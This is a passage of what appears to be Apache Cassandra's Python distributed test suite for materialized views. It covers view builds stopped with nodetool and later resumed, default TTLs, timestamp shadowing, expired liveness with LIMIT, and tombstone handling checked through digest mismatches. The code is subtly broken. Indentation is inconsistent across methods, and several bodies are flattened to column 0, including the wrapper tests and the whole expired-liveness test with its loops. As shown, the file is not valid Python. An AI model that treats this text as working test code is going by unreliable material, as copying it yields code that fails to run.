                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Verify that the MV has been successfully created")
    self._wait_for_view('ks', 't_by_v')
    assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_drop_with_stopped_build(self):
    """Test that a MV whose build has been stopped with `nodetool stop` can be dropped."""
    session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    nodes = self.cluster.nodelist()

    logger.debug("Inserting initial data")
    for i in range(5000):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))

    logger.debug("Slowing down MV build with byteman")
    for node in nodes:
        node.byteman_submit([mk_bman_path('4.0/view_builder_task_sleep.btm')])

    logger.debug("Create a MV")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
    self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)

    logger.debug("Stopping all running view build tasks with nodetool")
    for node in nodes:
        node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
        node.nodetool('stop VIEW_BUILD')

    logger.debug("Checking logs to verify that some view build tasks have been stopped")
    for node in nodes:
        node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
        node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
        self.check_logs_for_errors()

    logger.debug("Drop the MV while it is still building")
    session.execute("DROP MATERIALIZED VIEW t_by_v")

    logger.debug("Verify that the build has been stopped before its finalization without errors")
    for node in nodes:
        self.check_logs_for_errors()
        assert not node.grep_log('Marking view', filename='debug.log')
        assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')

    logger.debug("Verify that the view has been removed")
    failed = False
    try:
        session.execute("SELECT COUNT(*) FROM t_by_v")
    except InvalidRequest:
        failed = True
    assert failed, "The view shouldn't be queryable"

    logger.debug("Create the MV again")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Verify that the MV has been successfully created")
    self._wait_for_view('ks', 't_by_v')

    # The original byteman delay is still in place and can make this check
    # flaky, so retry for up to ~10 seconds (CASSANDRA-16962).
    for _ in range(10):
        try:
            assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
        except AssertionError:
            time.sleep(1)
        else:
            break
    assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_resume_stopped_build(self):
    """Test that MV builds stopped with `nodetool stop` are resumed after restart"""
    session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    nodes = self.cluster.nodelist()

    logger.debug("Inserting initial data")
    for i in range(5000):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))

    logger.debug("Slowing down MV build with byteman")
    for node in nodes:
        node.byteman_submit([mk_bman_path('4.0/view_builder_task_sleep.btm')])

    logger.debug("Create a MV")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
    self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)

    logger.debug("Stopping all running view build tasks with nodetool")
    for node in nodes:
        node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
        node.nodetool('stop VIEW_BUILD')

    logger.debug("Checking logs to verify that some view build tasks have been stopped")
    for node in nodes:
        node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
        node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
        node.watch_log_for('Interrupted build for view', filename='debug.log', timeout=120)
        assert not node.grep_log('Marking view', filename='debug.log')
        self.check_logs_for_errors()

    logger.debug("Check that MV shouldn't be built yet.")
    # Bug fix: COUNT(*) returns exactly one result row, so len(list(...))
    # was always 1 and the old `!= 5000` check was vacuously true.
    # Compare the counted value instead.
    assert list(session.execute("SELECT COUNT(*) FROM t_by_v"))[0][0] != 5000

    logger.debug("Restart the cluster")
    self.cluster.stop()
    marks = [node.mark_log() for node in nodes]
    self.cluster.start()
    session = self.patient_cql_connection(nodes[0])

    logger.debug("Verify that the MV has been successfully created")
    self._wait_for_view('ks', 't_by_v')
    assert_one(session, "SELECT COUNT(*) FROM ks.t_by_v", [5000])

    logger.debug("Checking logs to verify that the view build has been resumed and completed after restart")
    for node, mark in zip(nodes, marks):
        assert node.grep_log('Resuming view build', filename='debug.log', from_mark=mark)
        assert node.grep_log('Marking view', filename='debug.log', from_mark=mark)
        self.check_logs_for_errors()
@since('3.0')
def test_mv_with_default_ttl_with_flush(self):
    """Run the default-TTL MV scenario with memtable flushes enabled."""
    self._test_mv_with_default_ttl(True)
@since('3.0')
def test_mv_with_default_ttl_without_flush(self):
    """Run the default-TTL MV scenario without memtable flushes."""
    self._test_mv_with_default_ttl(False)
def _test_mv_with_default_ttl(self, flush):
    """
    Verify that a MV on a table with default_time_to_live can be deleted
    properly using expired livenessInfo.
    @jira_ticket CASSANDRA-14071
    """
    session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
    node1, node2, node3 = self.cluster.nodelist()
    session.execute('USE ks')

    logger.debug("MV with same key and unselected columns")
    session.execute("CREATE TABLE t2 (k int, a int, b int, c int, primary key(k, a)) with default_time_to_live=600")
    session.execute(("CREATE MATERIALIZED VIEW mv2 AS SELECT k,a,b FROM t2 "
                     "WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (a, k)"))
    session.cluster.control_connection.wait_for_schema_agreement()

    # Setting an unselected column keeps the view row alive...
    self.update_view(session, "UPDATE t2 SET c=1 WHERE k=1 AND a=1;", flush)
    assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 1])
    assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])

    # ...and clearing it removes both the base and the view row.
    self.update_view(session, "UPDATE t2 SET c=null WHERE k=1 AND a=1;", flush)
    assert_none(session, "SELECT k,a,b,c FROM t2")
    assert_none(session, "SELECT k,a,b FROM mv2")

    self.update_view(session, "UPDATE t2 SET c=2 WHERE k=1 AND a=1;", flush)
    assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 2])
    assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])

    self.update_view(session, "DELETE c FROM t2 WHERE k=1 AND a=1;", flush)
    assert_none(session, "SELECT k,a,b,c FROM t2")
    assert_none(session, "SELECT k,a,b FROM mv2")

    if flush:
        self.cluster.compact()
        assert_none(session, "SELECT * FROM t2")
        assert_none(session, "SELECT * FROM mv2")

    # test with user-provided ttl
    self.update_view(session, "INSERT INTO t2(k,a,b,c) VALUES(2,2,2,2) USING TTL 5", flush)
    self.update_view(session, "UPDATE t2 USING TTL 100 SET c=1 WHERE k=2 AND a=2;", flush)
    self.update_view(session, "UPDATE t2 USING TTL 50 SET c=2 WHERE k=2 AND a=2;", flush)
    self.update_view(session, "DELETE c FROM t2 WHERE k=2 AND a=2;", flush)

    time.sleep(5)

    assert_none(session, "SELECT k,a,b,c FROM t2")
    assert_none(session, "SELECT k,a,b FROM mv2")

    if flush:
        self.cluster.compact()
        assert_none(session, "SELECT * FROM t2")
        assert_none(session, "SELECT * FROM mv2")

    logger.debug("MV with extra key")
    session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int) with default_time_to_live=600")
    session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
                     "WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
    session.cluster.control_connection.wait_for_schema_agreement()

    # Each re-insert with a new 'a' value moves the row to a new view PK.
    self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1);", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, 1])
    assert_one(session, "SELECT * FROM mv", [1, 1, 1])

    self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 2, 1);", flush)
    assert_one(session, "SELECT * FROM t", [1, 2, 1])
    assert_one(session, "SELECT * FROM mv", [1, 2, 1])

    self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 3, 1);", flush)
    assert_one(session, "SELECT * FROM t", [1, 3, 1])
    assert_one(session, "SELECT * FROM mv", [1, 3, 1])

    if flush:
        self.cluster.compact()
        assert_one(session, "SELECT * FROM t", [1, 3, 1])
        assert_one(session, "SELECT * FROM mv", [1, 3, 1])

    # user provided ttl
    self.update_view(session, "UPDATE t USING TTL 50 SET a = 4 WHERE k = 1", flush)
    assert_one(session, "SELECT * FROM t", [1, 4, 1])
    assert_one(session, "SELECT * FROM mv", [1, 4, 1])

    self.update_view(session, "UPDATE t USING TTL 40 SET a = 5 WHERE k = 1", flush)
    assert_one(session, "SELECT * FROM t", [1, 5, 1])
    assert_one(session, "SELECT * FROM mv", [1, 5, 1])

    self.update_view(session, "UPDATE t USING TTL 30 SET a = 6 WHERE k = 1", flush)
    assert_one(session, "SELECT * FROM t", [1, 6, 1])
    assert_one(session, "SELECT * FROM mv", [1, 6, 1])

    if flush:
        self.cluster.compact()
        assert_one(session, "SELECT * FROM t", [1, 6, 1])
        assert_one(session, "SELECT * FROM mv", [1, 6, 1])
@flaky
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_with_flush(self):
    """Run the complex-timestamp scenario with memtable flushes enabled."""
    self._test_no_base_column_in_view_pk_complex_timestamp(flush=True)
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_without_flush(self):
    """Run the complex-timestamp scenario without memtable flushes."""
    self._test_no_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_no_base_column_in_view_pk_complex_timestamp(self, flush):
    """
    Able to shadow old view row if all columns in base are removed including unselected
    Able to recreate view row if at least one selected column alive
    @jira_ticket CASSANDRA-11500
    """
    session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
    node1, node2, node3 = self.cluster.nodelist()
    session.execute('USE ks')

    session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
    session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT k,c,a,b FROM t "
                     "WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c, k)"))
    session.cluster.control_connection.wait_for_schema_agreement()

    # update unselected column, view row should be alive
    self.update_view(session, "UPDATE t USING TIMESTAMP 1 SET e=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, None, 1, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, None])

    # remove unselected, add selected column, view row should be alive
    self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])

    # remove the last selected column, view row is removed
    self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=null WHERE k=1 AND c=1;", flush)
    assert_none(session, "SELECT * FROM t")
    assert_none(session, "SELECT * FROM mv")

    # update unselected column with ts=3, view row should come back
    self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, None])

    # insert livenessInfo, view row should be alive
    self.update_view(session, "INSERT INTO t(k,c) VALUES(1,1) USING TIMESTAMP 3", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, None])

    # remove unselected column; view row stays alive thanks to the base
    # row's livenessInfo
    self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=null WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, None])

    # add a selected column, view row should be alive
    self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])

    # update unselected column at ts=4, view row should be alive
    self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, 1])
    assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])

    # delete row at ts=3; view row survives due to the unselected write at ts=4
    self.update_view(session, "DELETE FROM t USING TIMESTAMP 3 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, None])

    # remove the unselected column, view row should be removed
    self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=null WHERE k=1 AND c=1;", flush)
    assert_none(session, "SELECT * FROM t")
    assert_none(session, "SELECT * FROM mv")

    # add a selected column at ts=7, view row is alive
    self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])

    # remove that selected column at ts=7, view row is dead
    self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=null WHERE k=1 AND c=1;", flush)
    assert_none(session, "SELECT * FROM t")
    assert_none(session, "SELECT * FROM mv")

    # add a different selected column at ts=5, view row is alive
    # (selected columns should not affect each other)
    self.update_view(session, "UPDATE t USING TIMESTAMP 5 SET a=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])

    # add selected column with ttl=20 (a long ttl is needed because the
    # flushing that self.update_view does can take a long time)
    self.update_view(session, "UPDATE t USING TTL 20 SET a=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])

    time.sleep(20)

    # update unselected column with ttl=20, view row should be alive
    self.update_view(session, "UPDATE t USING TTL 20 SET f=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, None])

    time.sleep(20)

    # once the second TTL also expires, base and view rows are both gone
    assert_none(session, "SELECT * FROM t")
    assert_none(session, "SELECT * FROM mv")
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_with_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=True)
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_without_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=False)
    def _test_base_column_in_view_pk_complex_timestamp(self, flush):
        """
        Able to shadow old view row with column ts greater than pk's ts and re-insert the view row
        Able to shadow old view row with column ts smaller than pk's ts and re-insert the view row
        @jira_ticket CASSANDRA-11500

        :param flush: passed through to self.update_view; when truthy, memtables are
                      flushed after each mutation so each step lands in its own sstable
        """
        session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
        node1, node2, node3 = self.cluster.nodelist()
        session.execute('USE ks')
        # Base column 'a' becomes part of the view's primary key.
        session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
        session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
                         "WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
        session.cluster.control_connection.wait_for_schema_agreement()
        # Set initial values TS=1
        self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 1;", flush)
        assert_one(session, "SELECT * FROM t", [1, 1, 1])
        assert_one(session, "SELECT * FROM mv", [1, 1, 1])
        # increase b ts to 10
        self.update_view(session, "UPDATE t USING TIMESTAMP 10 SET b = 2 WHERE k = 1;", flush)
        assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
        assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
        # switch entries. shadow a = 1, insert a = 2
        self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET a = 2 WHERE k = 1;", flush)
        assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
        assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
        # switch entries. shadow a = 2, insert a = 1
        self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a = 1 WHERE k = 1;", flush)
        assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
        assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
        # switch entries. shadow a = 1, insert a = 2 (also compact the sstables this time)
        self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET a = 2 WHERE k = 1;", flush, compact=True)
        assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
        assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
        # able to shadow view row even if base-column in view pk's ts is smaller than row timestamp
        # set row TS = 20, a@6, b@20
        self.update_view(session, "DELETE FROM t USING TIMESTAMP 5 where k = 1;", flush)
        assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, None, 2, 10])
        assert_none(session, "SELECT k,a,b,writetime(b) FROM mv")
        self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 6;", flush)
        assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
        assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
        self.update_view(session, "INSERT INTO t (k, b) VALUES (1, 1) USING TIMESTAMP 20;", flush)
        assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 1, 20])
        assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
        # switch entries. shadow a = 1, insert a = 2
        self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET a = 2 WHERE k = 1;", flush)
        assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 2, 1, 7, 20])
        assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 1, 20])
        # switch entries. shadow a = 2, insert a = 1
        self.update_view(session, "UPDATE t USING TIMESTAMP 8 SET a = 1 WHERE k = 1;", flush)
        assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 1, 1, 8, 20])
        assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
        # create another view row
        self.update_view(session, "INSERT INTO t (k, a, b) VALUES (2, 2, 2);", flush)
        assert_one(session, "SELECT k,a,b FROM t WHERE k = 2", [2, 2, 2])
        assert_one(session, "SELECT k,a,b FROM mv WHERE k = 2", [2, 2, 2])
        # stop node2, node3 so the following writes land only on node1
        logger.debug('Shutdown node2')
        node2.stop(wait_other_notice=True)
        logger.debug('Shutdown node3')
        node3.stop(wait_other_notice=True)
        # shadow a = 1, create a = 2
        query = SimpleStatement("UPDATE t USING TIMESTAMP 9 SET a = 2 WHERE k = 1", consistency_level=ConsistencyLevel.ONE)
        self.update_view(session, query, flush)
        # shadow (a=2, k=2) after 3 second
        query = SimpleStatement("UPDATE t USING TTL 3 SET a = 2 WHERE k = 2", consistency_level=ConsistencyLevel.ONE)
        self.update_view(session, query, flush)
        logger.debug('Starting node2')
        node2.start(wait_for_binary_proto=True)
        logger.debug('Starting node3')
        node3.start(wait_for_binary_proto=True)
        # For k = 1 & a = 1, We should get a digest mismatch of tombstones and repaired
        query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 1", consistency_level=ConsistencyLevel.ALL)
        result = session.execute(query, trace=True)
        self.check_trace_events(result.get_query_trace(), True)
        assert 0 == len(result.current_rows)
        # For k = 1 & a = 1, second time no digest mismatch
        result = session.execute(query, trace=True)
        self.check_trace_events(result.get_query_trace(), False)
        assert_none(session, "SELECT * FROM mv WHERE k = 1 AND a = 1")
        assert 0 == len(result.current_rows)
        # For k = 1 & a = 2, We should get a digest mismatch of data and repaired for a = 2
        query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 2", consistency_level=ConsistencyLevel.ALL)
        result = session.execute(query, trace=True)
        self.check_trace_events(result.get_query_trace(), True)
        assert 1 == len(result.current_rows)
        # For k = 1 & a = 2, second time no digest mismatch
        result = session.execute(query, trace=True)
        self.check_trace_events(result.get_query_trace(), False)
        assert 1 == len(result.current_rows)
        assert_one(session, "SELECT k,a,b,writetime(b) FROM mv WHERE k = 1", [1, 2, 1, 20])
        # wait out the TTL 3 on (k=2, a=2) so the view row expires
        time.sleep(3)
        # For k = 2 & a = 2, We should get a digest mismatch of expired and repaired
        query = SimpleStatement("SELECT * FROM mv WHERE k = 2 AND a = 2", consistency_level=ConsistencyLevel.ALL)
        result = session.execute(query, trace=True)
        self.check_trace_events(result.get_query_trace(), True)
        logger.debug(result.current_rows)
        assert 0 == len(result.current_rows)
        # For k = 2 & a = 2, second time no digest mismatch
        result = session.execute(query, trace=True)
        self.check_trace_events(result.get_query_trace(), False)
        assert 0 == len(result.current_rows)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes1(self):
self._test_expired_liveness_with_limit(rf=1, nodes=1)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes3(self):
self._test_expired_liveness_with_limit(rf=1, nodes=3)
@since('3.0')
def test_expired_liveness_with_limit_rf3(self):
self._test_expired_liveness_with_limit(rf=3, nodes=3)
def _test_expired_liveness_with_limit(self, rf, nodes):
"""
Test MV with expired liveness limit is properly handled
@jira_ticket CASSANDRA-13883
"""
session = self.prepare(rf=rf, nodes=nodes, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1 = self.cluster.nodelist()[0]
session.execute('USE ks')
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
for k in range(100):
session.execute("INSERT INTO t (k, a, b) VALUES ({}, {}, {})".format(k, k, k))
# generate view row with expired liveness except for row 50 and 99
for k in range(100):
if k == 50 or k == 99:
continue
session.execute("DELETE a FROM t where k = {};".format(k))
# there should be 2 live data
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
# verify IN
keys = range(100)
assert_one(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 1".format(', '.join(str(x) for x in keys)),
[50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 2".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({})".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
# verify fetch size
session.default_fetch_size = 1
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_with_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=True)
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_without_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=False)
    def _test_base_column_in_view_pk_commutative_tombstone_(self, flush):
        """
        view row deletion should be commutative with newer view livenessInfo, otherwise deleted columns may be resurrected.
        @jira_ticket CASSANDRA-13409

        :param flush: passed through to self.update_view; when truthy, memtables are
                      flushed after each mutation so each step lands in its own sstable
        """
        session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
        node1 = self.cluster.nodelist()[0]
        session.execute('USE ks')
        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
        session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
        session.cluster.control_connection.wait_for_schema_agreement()
        # keep each flushed sstable separate so the merge order is exercised
        for node in self.cluster.nodelist():
            node.nodetool("disableautocompaction")
        # sstable 1, Set initial values TS=1
        self.update_view(session, "INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 1", flush)
        assert_one(session, "SELECT * FROM t_by_v", [1, 1, 'a', 3.0])
        # sstable 2, change v's value and TS=2, tombstones v=1 and adds v=0 record
        self.update_view(session, "DELETE FROM t USING TIMESTAMP 2 WHERE id = 1;", flush)
        assert_none(session, "SELECT * FROM t_by_v")
        assert_none(session, "SELECT * FROM t")
        # sstable 3, tombstones of mv created by base deletion should remain.
        self.update_view(session, "INSERT INTO t (id, v) VALUES (1, 1) USING TIMESTAMP 3", flush)
        assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
        assert_one(session, "SELECT * FROM t", [1, 1, None, None])
        # sstable 4, shadow view row (id=1, v=1), insert (id=1, v=2, ts=4)
        self.update_view(session, "UPDATE t USING TIMESTAMP 4 set v = 2 WHERE id = 1;", flush)
        assert_one(session, "SELECT * FROM t_by_v", [2, 1, None, None])
        assert_one(session, "SELECT * FROM t", [1, 2, None, None])
        # sstable 5, shadow view row (id=1, v=2), insert (id=1, v=1 ts=5)
        self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = 1 WHERE id = 1;", flush)
        assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
        assert_one(session, "SELECT * FROM t", [1, 1, None, None])  # data deleted by row-tombstone@2 should not resurrect
        # compact all five sstables together and re-check the same invariants
        if flush:
            self.cluster.compact()
            assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
            assert_one(session, "SELECT * FROM t", [1, 1, None, None])  # data deleted by row-tombstone@2 should not resurrect
        # shadow view row (id=1, v=1)
        self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = null WHERE id = 1;", flush)
        assert_none(session, "SELECT * FROM t_by_v")
        assert_one(session, "SELECT * FROM t", [1, None, None, None])
    def test_view_tombstone(self):
        """
        Test that materialized views properly tombstone superseded entries
        @jira_ticket CASSANDRA-10261
        @jira_ticket CASSANDRA-10910
        """
        self.prepare(rf=3, options={'hinted_handoff_enabled': False})
        node1, node2, node3 = self.cluster.nodelist()
        session = self.patient_exclusive_cql_connection(node1)
        # tracing below may take a while to become available
        session.max_trace_wait = 120
        session.execute('USE ks')
        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
        session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
        session.cluster.control_connection.wait_for_schema_agreement()
        # Set initial values TS=0, verify
        session.execute(SimpleStatement("INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 0",
                                        consistency_level=ConsistencyLevel.ALL))
        self._replay_batchlogs()
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = 1",
            [1, 1, 'a', 3.0]
        )
        # update the non-pk column v2 at TS=1; view row (v=1) keeps its key
        session.execute(SimpleStatement("INSERT INTO t (id, v2) VALUES (1, 'b') USING TIMESTAMP 1",
                                        consistency_level=ConsistencyLevel.ALL))
        self._replay_batchlogs()
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = 1",
            [1, 1, 'b', 3.0]
        )
        # change v's value and TS=3, tombstones v=1 and adds v=0 record
        session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 3 SET v = 0 WHERE id = 1",
                                        consistency_level=ConsistencyLevel.ALL))
        self._replay_batchlogs()
        assert_none(session, "SELECT * FROM t_by_v WHERE v = 1")
        # write v back to 1 at TS=4 while node2 is down, so node2 misses it
        logger.debug('Shutdown node2')
        node2.stop(wait_other_notice=True)
        session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 4 SET v = 1 WHERE id = 1",
                                        consistency_level=ConsistencyLevel.QUORUM))
        self._replay_batchlogs()
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = 1",
            [1, 1, 'b', 3.0]
        )
        node2.start(wait_for_binary_proto=True)
        # We should get a digest mismatch
        query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1",
                                consistency_level=ConsistencyLevel.ALL)
        result = session.execute(query, trace=True)
        self.check_trace_events(result.get_query_trace(), True)
        # We should not get a digest mismatch the second time
        query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1", consistency_level=ConsistencyLevel.ALL)
        result = session.execute(query, trace=True)
